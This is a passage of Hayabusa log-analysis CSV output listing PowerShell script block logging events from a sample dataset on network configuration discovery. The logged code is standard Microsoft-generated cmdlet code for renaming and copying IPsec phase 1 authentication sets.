Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPhase2AuthSet ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 